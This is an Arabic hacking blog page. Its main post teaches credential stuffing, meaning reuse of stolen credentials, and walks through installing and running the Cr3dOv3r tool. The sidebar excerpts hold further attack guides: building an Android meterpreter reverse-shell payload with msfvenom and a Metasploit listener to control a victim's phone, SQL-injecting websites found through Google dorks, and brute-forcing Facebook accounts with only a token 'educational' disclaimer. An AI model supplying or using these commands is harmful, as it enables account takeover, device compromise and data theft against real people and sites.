هجوم Credential Stuffing بأداة Cr3dOv3r: كيفية كشف واستخدام بيانات الاعتماد المسروقة

Mr. RedRaccoon

ما هو Credential Stuffing

Credential Stuffing هو هجوم إلكتروني يستخدمه المتسللون للوصول إلى الحسابات باستخدام بيانات اعتماد مسروقة. يعتمد الهجوم على أدوات تلقائية تقوم بمحاولة تسجيل الدخول إلى حسابات باستخدام كلمات مرور أو بيانات مسربة.

خطوات الهجوم:

  1. التحقق مما إذا كان البريد الإلكتروني المستهدف قد تسربت بياناته، ثم يتم استخدام كلمة المرور المسربة للتحقق من صحة الدخول إلى المواقع.
  2. التحقق مما إذا كانت بيانات الاعتماد المستخدمة على مواقع أخرى، وذلك لفحص إمكانية إعادة استخدام نفس كلمة المرور.
  3. التحقق مما إذا كانت كلمة المرور القديمة المسربة ما زالت مستخدمة في أي موقع آخر.

أداة Cr3dOv3r

Cr3dOv3r هي أداة مفتوحة المصدر مصممة للمساعدة في تنفيذ مثل هذه الفحوصات.

رابط المشروع: Cr3dOv3r على GitHub

كيفية الاستخدام

يمكن استخدام الأداة للتحقق من البريد الإلكتروني أو اسم المستخدم:

usage: Cr3d0v3r.py [-h] [-p] [-np] [-q] email
  • email: البريد الإلكتروني أو اسم المستخدم للتحقق منه.

الخيارات الإضافية:

  • -h, --help: عرض المساعدة والخروج.
  • -p: لا تتحقق من التسريبات أو كلمات المرور بالنص العادي.
  • -np: لا تتحقق من كلمات المرور بالنص العادي.
  • -q: الوضع الهادئ (بدون عرض الشعار).

متطلبات الأداة

  • Python 3.x أو 2.x (يفضل Python 3).
  • نظام تشغيل Linux أو Windows.
  • تعمل على بعض الأجهزة بنظام macOS وPython 3.
  • تثبيت المكتبات المطلوبة في الملف requirements.txt.

تثبيت الأداة

لـ Windows:

  1. تحميل الملف المضغوط وفك ضغطه.
  2. الانتقال إلى مجلد الأداة:
    cd Cr3dOv3r-master $
  3. تثبيت المتطلبات:
    python -m pip install -r win_requirements.txt $
  4. تشغيل الأداة:
    python Cr3d0v3r.py -h $

لـ Linux:

  1. استنساخ المستودع:
    git clone https://github.com/D4Vinci/Cr3dOv3r.git $
  2. الانتقال إلى المجلد:
    cd Cr3dOv3r $
  3. تثبيت المتطلبات:
    python3 -m pip install -r requirements.txt $
  4. تشغيل الأداة:
    python3 Cr3d0v3r.py -h $

لـ Docker:

  1. استنساخ المستودع:
    git clone https://github.com/D4Vinci/Cr3dOv3r.git $
  2. بناء الصورة:
    /docker build -t cr3dov3r Cr3dOv3r $
  3. تشغيل الأداة:
    "docker run -it cr3dov3r "test@example.com $

تعليقات

إرسال تعليق

Thankyou.

المشاركات الشائعة من هذه المدونة

كيفية إنشاء Payload ملغم واستخدام Metasploit

صورة
Mr.  RedRaccoon 1. إنشاء Payload ملغم باستخدام msfvenom: افتح Termux أو أي بيئة تشغيل تتيح لك تنفيذ الأوامر، ثم استخدم الأمر التالي لإنشاء Payload ملغم: msfvenom -p android/meterpreter/reverse_tcp LHOST=(Your IP) LPORT=(Your Port) R > /sdcard/termux.apk استبدل (Your IP) بعنوان IP الخاص بك. استبدل (Your Port) بالمنفذ الذي ترغب في استخدامه. 2. فتح Metasploit: بعد إنشاء الـ Payload، افتح Metasploit باستخدام الأمر: ./msfconsole 3. إعداد Metasploit لاستقبال الـ Payload: في Metasploit، اتبع الأوامر التالية: use exploit/multi/handler set payload android/meterpreter/reverse_tcp set lhost (Your IP) set lport (Your Port) run استبدل (Your IP) بعنوان IP الخاص بك. استبدل (Your Port) بالمنفذ الذي اخترته. 4. استخدام Metasploit للتحكم بالجهاز المخترق: بمجرد اتصال الـ Payload بالجهاز، يمكنك استخدام الأوامر التالية للتحكم بالجهاز: help # عرض قائمة بالأوامر المتاحة shell # فتح قشرة النظام (Shell) cd /sdcard # تغيير الدليل إلى /sdcard ls # عرض محتويات الدليل ...
قراءة المزيد

كيفية اختراق موقع ويب باستخدام Termux

صورة
Mr.  RedRaccoon الخطوة الأولى: تحديث النظام وتثبيت الأدوات اللازمة تحديث النظام وتثبيت الأدوات: افتح Termux وأدخل الأوامر التالية: $ apt update && apt upgrade $ pkg install python2 $ pkg install git تثبيت Termux-LazySQLMap: أدخل الأوامر التالية لتثبيت الأداة: $ git clone https://github.com/verluchie/termux-lazysqlmap $ cd termux-lazysqlmap $ chmod 777 install.sh $ ./install.sh الخطوة الثانية: استخدام Google Dorks للعثور على مواقع الويب استخدم Google Dorks للعثور على مواقع الويب الضعيفة التي يمكنك اختبارها. (لمزيد من المعلومات حول Google Dorks، يمكنك البحث عن كيفية استخدامها). الخطوة الثالثة: تنفيذ الاختراق باستخدام Termux-LazySQLMap تشغيل الأداة: بعد تثبيت Termux-LazySQLMap، ابدأ الأداة بكتابة الأمر التالي في Termux: $ lazysqlmap اختيار الموقع المستهدف: أدخل عنوان الموقع الذي تريد اختراقه عندما يُطلب منك ذلك. اختيار خيارات التحقق: اختر الخيار المناسب لك. على سبيل المثال، اختر الخيار الذي يعود بالجداول في قاعدة البيانات. استرجاع الجداول: استخدم الأمر sitedb لاسترجاع الجد...
قراءة المزيد

كيفية اختراق حساب فيسبوك باستخدام Termux

صورة
Mr.  RedRaccoon ملاحظة: يجب أن تكون على علم بأن استخدام الأدوات والبرمجيات لاختراق الحسابات بدون إذن هو غير قانوني وغير أخلاقي. الهدف من هذا الشرح هو توضيح كيفية عمل الأدوات لأغراض تعليمية فقط. يجب عليك دائمًا احترام خصوصية الآخرين والامتثال للقوانين المحلية. إليك خطوات استخدام Termux لاختراق حساب فيسبوك عبر التخمين: تحديث النظام وتثبيت الأدوات الأساسية: افتح Termux واستخدم الأوامر التالية لتحديث النظام وتثبيت الأدوات المطلوبة: apt update && apt upgrade $ $ pkg install git $ pkg install python $ pkg install python2 تثبيت سكربت التخمين: قم بتحميل السكربت من GitHub باستخدام الأوامر التالية: $git clone https://github.com/hackermohamedPro/Aliens-fb $ $ cd Aliens-fb $ pip2 install mechanize إنشاء قائمة كلمات المرور: قم بتشغيل السكربت لإنشاء قائمة كلمات مرور: $python Aliens-list.py عند تشغيل السكربت، سيُطلب منك إدخال اسم لقائمة كلمات المرور، تأكد من استخدام تنسيق .txt مثل passwords.txt . املأ القائمة بكلمات المرور المحتملة، ثم اكتب Pro واضغط على Enter . تشغيل أداة التخمين: ...
قراءة المزيد